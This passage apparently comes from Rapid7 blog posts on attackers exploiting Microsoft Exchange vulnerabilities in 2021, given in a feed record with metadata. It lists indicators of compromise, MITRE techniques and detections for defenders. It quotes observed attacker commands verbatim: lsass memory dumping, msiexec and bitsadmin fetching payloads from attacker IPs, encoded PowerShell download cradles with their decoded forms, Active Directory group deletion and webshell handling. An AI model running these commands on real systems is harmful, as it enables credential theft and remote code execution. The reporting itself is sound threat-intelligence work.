Lsass.exe dumping using procdump64.exe and C:\\Temp\\update.exe \n(MD5: [f557a178550733c229f1087f2396f782](<https://www.virustotal.com/gui/file/173ac2a1f99fe616f5efa3a7cf72013ab42a68f7305e24ed795a98cb08046ee1/detection>)):\n\n * cmd /c cd /d C:\\\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n\nb. Reconnaissance commands:\n\n * whoami.exe\n * ping.exe\n * tasklist.exe\n * quser.exe\n * query.exe\n\n## **Indicators Of Compromise (IOCs)**\n\nType | Value \n---|--- \nIP Address | 165.232.154.116 \nIP Address | 157.230.221.198 \nIP Address | 161.35.45.41 \nIP Address | 45.77.252.175 \nIP Address | 104.248.49[.]97 \nIP Address That Interacts with Uploaded Webshells | 194.87.69[.]35 \nURL | /ecp/y.js \nURL | /ecp/DDI/DDIService.svc/GetList \nURL | /ecp/DDI/DDIService.svc/SetObject \nURL | /owa/auth/errorEE.aspx \nURL | /owa/auth/logon.aspx \nURL | /owa/auth/errorFE.aspx \nURL | /aspnet_client/aa.aspx \nURL | /aspnet_client/iis \nURL | /iistart.aaa \nURL | /owa/iistart.aaa \nUser Agent | python-requests/2.25.1 \nUser Agent | antSword/v2.1 \n \n## **References**\n\n * <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>\n * <https://github.com/microsoft/CSS-Exchange/tree/main/Security>\n\n## Update: March 7, 2021\n\nMicrosoft [published tools](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) to help identify servers potentially compromised by [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). 
Upon review of the checks within the tools, Rapid7 identified the following additional pre-existing detections within InsightIDR\u2019s Attacker Behavior Analytics that would have alerted customers to this malicious actor in their environment:\n\n * Attacker Technique - PowerShell New-MailboxExportRequest (Created March 14, 2019)\n * Attacker Technique - PowerShell Remove-MailboxExportRequest (Created Dec. 15, 2020)\n * Attacker Technique - Compressing Mailbox With 7zip (Created Dec. 15, 2020)\n * Attacker Technique - PowerShell Download Cradles (Created Jan. 3, 2019)\n\nThese previously existing detections are based on observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response, and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration across the Detection and Response practice, we help ensure our clients continue to have coverage for the latest techniques being used by malicious actors.\n\n## Update March 18, 2021\n\nWidespread [exploitation of vulnerable on-premises Exchange servers](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) is ongoing. Microsoft has released a \"One-Click Exchange On-premises Mitigation Tool\" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended \"to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\" They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. 
See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n_We'd like to extend a huge thank-you to everyone who helped contribute to this blog post: _\n\n * _Robert Knapp_\n * _Shazan Khaja_\n * _Lih Wern Wong _\n * _Tiffany Anders _\n * _Andrew Iwamaye _\n * _Rashmi Joshi_\n * _Daniel Lydon_\n * _Dan Kelly_\n * _Carlo Anez Mazurco_\n * _Eoin Miller_\n * _Charlie Stafford_\n * _The Rapid7 MVM Team_", "cvss3": {}, "published": "2021-03-03T00:41:04", "type": "rapid7blog", "title": "Rapid7\u2019s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T00:41:04", "id": "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "href": "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-23T17:16:33", "description": "\n\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in [Microsoft\u2019s Exchange Server](<https://aka.ms/ExchangeVulns>) by an attacker referred to as HAFNIUM. 
One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.\n\n> \u201cRunning as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.\u201d \nSource: [Application Pool Identities](<https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities>)\n\nBecause this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>) and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim\u2019s environment.\n\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. 
These devices also commonly fall outside of standard patch management systems. Rapid7 has observed that the time between a vulnerability being disclosed and a working exploit being created, adopted, and used en masse has shrunk, which gives victims little time to test and deploy fixes while adhering to change control processes for systems providing mission-critical services.\n\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold is [password spraying](<https://attack.mitre.org/techniques/T1110/003/>) against systems that are providing remote access services to the public internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent vulnerabilities in [Citrix Netscaler](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), [Progress\u2019 Telerik](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>), and [Pulse Secure\u2019s Pulse Connect Secure](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>), to name a few.\n\nWhile the method of gaining a foothold in a victim\u2019s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. The reason for this is that the methods used once inside a victim\u2019s systems rarely need to be changed, as they continue to be very effective for the attacker. 
The continued adoption of \u201cliving off the land\u201d techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.\n\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7\u2019s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our [Managed Detection and Response Security Operations Center](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) and [Incident Response](<https://www.rapid7.com/services/security-consulting/incident-response-services/>) teams to develop and update our detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s [Attacker Behavior Analytics](<https://docs.rapid7.com/insightidr/aba-detections>) to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of exploitation of unknown vulnerabilities and allows them to securely advance. \n\nLast, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even a single group may do it and have various different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.\n\n## HAFNIUM-related activity\n\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. 
This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7\u2019s [Insight Agent](<https://docs.rapid7.com/insight-agent/>) from Feb. 27 through March 7 in 2021. It should be noted that the way the client used by the attacker spawns processes through the China Chopper webshell has remained [virtually unchanged since at least 2013](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>). These command line arguments are quite distinct and easy to find in logs containing command line arguments. This means detections developed against these patterns have the potential for an effective lifespan for the better part of a decade.\n\n_Source: _[_The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)_](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>)\n\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that, by default, when IIS is configured for Microsoft Exchange\u2019s Outlook Web Access, it will have an environment variable and value set to the following:\n\n`APP_POOL_ID=MSExchangeOWAAppPool`\n\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with [InsightIDR\u2019s Attacker Behavior Analytics](<https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/>), the TIDE team was able to write a detection that matches whenever a process is executed and either its own environment or its parent's environment contains this variable and value. This allowed us to not only find the already known use of China Chopper, but also several other attackers exploiting this vulnerability using different techniques. 
\n\nUsing China Chopper, the attacker executed the Microsoft Sysinternals utility [procdump64.exe](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>) against the lsass.exe process to copy the contents of its memory to a file on disk. This allows the attacker to retrieve and analyze this memory dump later with utilities such as [mimikatz](<https://github.com/gentilkiwi/mimikatz>) to [extract passwords from the memory dump of this process](<https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#minidump>). This enables this attacker to potentially come back to many of these victim email accounts at a later date if two-factor authentication is not employed. Additionally, even if reasonable password change policies are implemented at these victim locations, users will often rotate passwords in a predictable manner. For instance, if a password for a user is \u201cThisIsMyPassword1!\u201d, when forced to change, they will likely just increment the digit at the end to \u201cThisIsMyPassword2!\u201d. 
This makes it easy for attackers to guess the future passwords based on the predictability of human behavior.\n\nThe following commands were observed by Rapid7 being executed by the attacker known as HAFNIUM:\n\nProcdump.exe commands executed via China Chopper webshell to write the memory contents of the lsass.exe process to disk:\n \n \n cmd /c cd /d C:\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n \n\nReconnaissance commands executed via China Chopper webshell to gather information about the Active Directory domain controllers, users, systems, and processes:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&nltest\" /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&HOSTNAME\" & whoami & nltest /dclist:<REDACTED_DOMAIN>&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&tasklist&echo [S]&cd&echo [E]\n cmd /c cd /d E:\\\\logs&tasklist &echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&net group \"Domain computers\" /do&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&tasklist /v&echo [S]&cd&echo [E]\n \n\nEnumeration of further information about specific processes on the victim system. 
The process smex_master.exe is from [Trend Micro\u2019s ScanMail](<https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/scanmail-for-exchange.html>) and unsecapp.exe is from [Microsoft Windows](<https://docs.microsoft.com/en-us/windows/win32/wmisdk/setting-security-on-an-asynchronous-call#setting-asynchronous-call-security-in-c>).\n \n \n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=smex_master.exe get ExecutablePath,commandline&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get ExecutablePath&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&wmic process where name=unsecapp.exe get processid&echo [S]&cd&echo [E]\n \n \n\nDeletion of groups in Active Directory using the net.exe command executed via China Chopper:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n \n\nNetwork connectivity check and/or egress IP address enumeration commands executed via China Chopper webshell:\n \n \n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d \"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth&ping\" -n 1 <REDACTED_HOSTNAME>&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot&ping -n 1 8.8.8.8&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -m 10 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&c:\\windows\\temp\\curl.exe -vv -k -m 10 https://www.google.com > C:\\windows\\temp\\b.log 2>&1&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping 
-n 1 ipinfo.io&echo [S]&cd&echo [E]\n cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&ping -n 1 www.google.com&echo [S]&cd&echo [E]\n cmd /c cd /d c:\\\\temp&ping www.google.com&echo [S]&cd&echo [E]\n \n\nSecond-stage payload retrieval commands executed via China Chopper webshell:\n \n \n cmd /c cd /d C:\\\\inetpub\\\\wwwroot\\\\aspnet_client&msiexec /q /i http://103.212.223.210:9900/nvidia.msi&echo [S]&cd&echo [E]\n \n\nFilesystem interaction commands executed via China Chopper webshell to search file contents, hide, and delete files:\n \n \n \\cmd /c cd /d C:\\inetpub\\wwwroot\\aspnet_client\\system_web&findstr Request \"\\\\<REDACTED_HOSTNAME>\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ErrorFF.aspx&echo\" [S]&cd&echo [E]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r OutlookEN.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&attrib +h +s +r TimeoutLogout.aspx&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\OutlookEN.aspx'&echo [S]\n cmd /c cd /d C:/inetpub/wwwroot/aspnet_client&del 'E:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\TimeoutLogout.aspx'&echo [S]\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Net Command Deleting Exchange Admin Group\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\n## MITRE ATT&CK techniques observed in HAFNIUM-related activity\n\n * [T1003](<https://attack.mitre.org/techniques/T1003/>) \\- OS Credential Dumping\n * [T1003.001](<https://attack.mitre.org/techniques/T1003/001/>) \\- OS Credential Dumping: LSASS Memory\n * [T1005](<https://attack.mitre.org/techniques/T1005>) \\- Data from Local System\n * 
[T1007](<https://attack.mitre.org/techniques/T1007>) \\- System Service Discovery\n * [T1033](<https://attack.mitre.org/techniques/T1033>) \\- System Owner/User Discovery\n * [T1041](<https://attack.mitre.org/techniques/T1041/>) \\- Exfiltration Over C2 Channel\n * [T1047](<https://attack.mitre.org/techniques/T1047>) \\- Windows Management Instrumentation\n * [T1057](<https://attack.mitre.org/techniques/T1057>) \\- Process Discovery\n * [T1059](<https://attack.mitre.org/techniques/T1059>) \\- Command and Scripting Interpreter\n * [T1059.003](<https://attack.mitre.org/techniques/T1059/003>) \\- Command and Scripting Interpreter: Windows Command Shell\n * [T1071](<https://attack.mitre.org/techniques/T1071>) \\- Application Layer Protocol\n * [T1071.001](<https://attack.mitre.org/techniques/T1071/001>) \\- Application Layer Protocol: Web Protocols\n * [T1074](<https://attack.mitre.org/techniques/T1074>) \\- Data Staged\n * [T1074.001](<https://attack.mitre.org/techniques/T1074/001>) \\- Data Staged: Local Data Staging\n * [T1083](<https://attack.mitre.org/techniques/T1083/>) \\- File and Directory Discovery\n * [T1087](<https://attack.mitre.org/techniques/T1087>) \\- Account Discovery\n * [T1087.001](<https://attack.mitre.org/techniques/T1087/001>) \\- Account Discovery: Local Account\n * [T1087.002](<https://attack.mitre.org/techniques/T1087/002>) \\- Account Discovery: Domain Account\n * [T1098](<https://attack.mitre.org/techniques/T1098>) \\- Account Manipulation\n * [T1105](<https://attack.mitre.org/techniques/T1105/>) \\- Ingress Tool Transfer\n * [T1190](<https://attack.mitre.org/techniques/T1190>) \\- Exploit Public-Facing Application\n * [T1203](<https://attack.mitre.org/techniques/T1203>) \\- Exploitation For Client Execution\n * [T1218](<https://attack.mitre.org/techniques/T1218>) \\- Signed Binary Proxy Execution\n * [T1218.007](<https://attack.mitre.org/techniques/T1218/007/>) \\- Signed Binary Proxy Execution: Msiexec\n * 
[T1505](<https://attack.mitre.org/techniques/T1505/>) \\- Server Software Component\n * [T1505.003](<https://attack.mitre.org/techniques/T1505/003/>) \\- Server Software Component: Web Shell\n * [T1518](<https://attack.mitre.org/techniques/T1518>) \\- Software Discovery\n * [T1518.001](<https://attack.mitre.org/techniques/T1518/001>) \\- Software Discovery: Security Software Discovery\n * [T1531](<https://attack.mitre.org/techniques/T1531>) \\- Account Access Removal\n * [T1583](<https://attack.mitre.org/techniques/T1583>) \\- Acquire Infrastructure\n * [T1583.003](<https://attack.mitre.org/techniques/T1583/003>) \\- Acquire Infrastructure: Virtual Private Server\n * [T1587](<https://attack.mitre.org/techniques/T1587>) \\- Develop Capabilities\n * [T1587.001](<https://attack.mitre.org/techniques/T1587/001>) \\- Develop Capabilities: Malware\n * [T1587.004](<https://attack.mitre.org/techniques/T1587/004>) \\- Develop Capabilities: Exploits\n * [T1588](<https://attack.mitre.org/techniques/T1588>) \\- Obtain Capabilities\n * [T1588.001](<https://attack.mitre.org/techniques/T1588/001>) \\- Obtain Capabilities: Malware\n * [T1588.002](<https://attack.mitre.org/techniques/T1588/002>) \\- Obtain Capabilities: Tool\n * [T1588.005](<https://attack.mitre.org/techniques/T1588/005>) \\- Obtain Capabilities: Exploits\n * [T1588.006](<https://attack.mitre.org/techniques/T1588/006>) \\- Obtain Capabilities: Vulnerabilities\n * [T1595](<https://attack.mitre.org/techniques/T1595>) \\- Active Scanning\n * [T1595.001](<https://attack.mitre.org/techniques/T1595/001>) \\- Active Scanning: Scanning IP Blocks\n * [T1595.002](<https://attack.mitre.org/techniques/T1595/002>) \\- Active Scanning: Vulnerability Scanning\n\n## Non-HAFNIUM-related activity\n\nRapid7 has also observed several additional distinct types of post-exploitation activity of these Exchange vulnerabilities in recent weeks by several other attackers other than HAFNIUM. 
We have grouped these and distilled the unique types of commands being executed into the individual sections shown below.\n\n### Minidump and Makecab attacker\n\nThis attacker was seen uploading batch scripts to execute the Microsoft utility [dsquery.exe](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952\\(v=ws.11\\)>) to enumerate all users from the Active Directory domain. The attacker would also use the [Minidump function in comsvcs.dll](<https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz#comsvcs-dll>) with rundll32.exe in order to write the memory of the lsass.exe process to disk. The attacker then uses the existing Microsoft utility [makecab.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/makecab>) to compress the memory dump for more efficient retrieval. Overall, this attacker has some similarities in the data targeted for collection from victims to those discussed in other reporting on the actor known as HAFNIUM. 
However, the tools and techniques used differ enough that this cannot easily be attributed to the same attacker without additional compelling links.\n \n \n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\inetpub\\wwwroot\\aspnet_client\\test.bat\n dsquery * -limit 0 -filter objectCategory=person -attr * -uco\n powershell rundll32.exe c:\\windows\\system32\\comsvcs.dll MiniDump 900 c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp full\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp.dmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n makecab c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.tmp c:\\inetpub\\wwwroot\\aspnet_client\\<REDACTED_33_CHARACTER_STRING>.dmp.zip\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Minidump via COM Services DLL\n\n### Malicious DLL attacker\n\nThis attacker was seen uploading and executing a DLL through rundll32.exe and redirecting the output to a text file. The demo.dll file is believed to have similar functionality to mimikatz or other hash/password dumping utilities. The attacker also made use of the net, netstat, and tasklist utilities, along with [klist](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/klist>), in order to display cached Kerberos tickets. This again has some overlap with the types of data being collected by HAFNIUM, but the methods to do so differ. 
Additionally, this is a commonly employed action for an attacker to take post-compromise.\n \n \n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c net time /do\n net time /do\n c:\\windows\\system32\\cmd.exe /c rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n rundll32 c:\\programdata\\demo.dll,run -lm > c:\\programdata\\1.txt\n c:\\windows\\system32\\cmd.exe /c klist\n c:\\windows\\system32\\cmd.exe /c tasklist\n tasklist\n c:\\windows\\system32\\cmd.exe /c netstat -ano\n netstat -ano\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Opera Browser and Cobalt Strike attacker\n\nThis attacker was seen using common techniques to download scripts with Microsoft\u2019s [BITSAdmin](<https://docs.microsoft.com/en-us/windows/win32/bits/bitsadmin-tool>). These scripts would then execute encoded PowerShell commands that would retrieve a legitimate version of the Opera Browser that has a known DLL search order vulnerability ([CVE-2018-18913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18913>)). The attacker would also retrieve malicious DLLs and other files to place into the same directory as the legitimate opera_browser.exe file for execution. This would then load the malicious code in the DLL located in the same directory as the browser. 
The eventual end of this execution would result in the execution of [Cobalt Strike](<https://www.cobaltstrike.com/>), a favorite tool of attackers that distributes ransomware:\n \n \n C:\\Windows\\System32\\bitsadmin.exe /rawreturn /transfer getfile http://89.34.111.11/3.avi c:\\Users\\public\\2.bat\n C:\\Windows\\System32\\cmd.exe /c c:\\Users\\public\\2.bat\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAGMAbwBkAGUAJwAsACcAQwA6AFwAdQBzAGUAcgBzAFwAcAB1AGIAbABpAGMAXABvAHAAZQByAGEAXABjAG8AZABlACcAKQA=\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBwAG4AZwAnACkA\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBkAGwAbAAnACkA\n msiexec.exe -k\n powershell Start-Sleep -Seconds 10\n cmd /c C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n C:\\\\users\\\\public\\\\opera\\\\opera_browser.exe\n powershell -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA4ADYALgAxADAANQAuADEAOAAuADEAMQA2AC8AbgBlAHcAcwAvAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACwAJwBDADoAXAB1AHMAZQByAHMAXABwAHUAYgBsAGkAYwBcAG8AcABlAHIAYQBcAG8AcABlAHIAYQBfAGIAcgBvAHcAcwBlAHIALgBlAHgAZQAnACkA\n \n\nBase64 decoded 
strings passed to PowerShell:\n \n \n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/code','C:\\users\\public\\opera\\code')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.png','C:\\users\\public\\opera\\opera_browser.png')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.dll','C:\\users\\public\\opera\\opera_browser.dll')\n (new-object System.Net.WebClient).DownloadFile('http://86.105.18.116/news/opera_browser.exe','C:\\users\\public\\opera\\opera_browser.exe')\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Download And Execute With Background Intelligent Transfer Service\n * Attacker Technique - URL Passed To BitsAdmin\n\n### Six-character webshell attacker\n\nThis attacker was seen uploading webshells and copying them to other locations within the webroot.\n \n \n cmd /c copy C:\\inetpub\\wwwroot\\aspnet_client\\discover.aspx \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_6_CHARACTER_STRING>.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Encoded PowerShell download cradle attacker\n\nThis attacker was seen executing encoded PowerShell commands that would download malware from a remote location. 
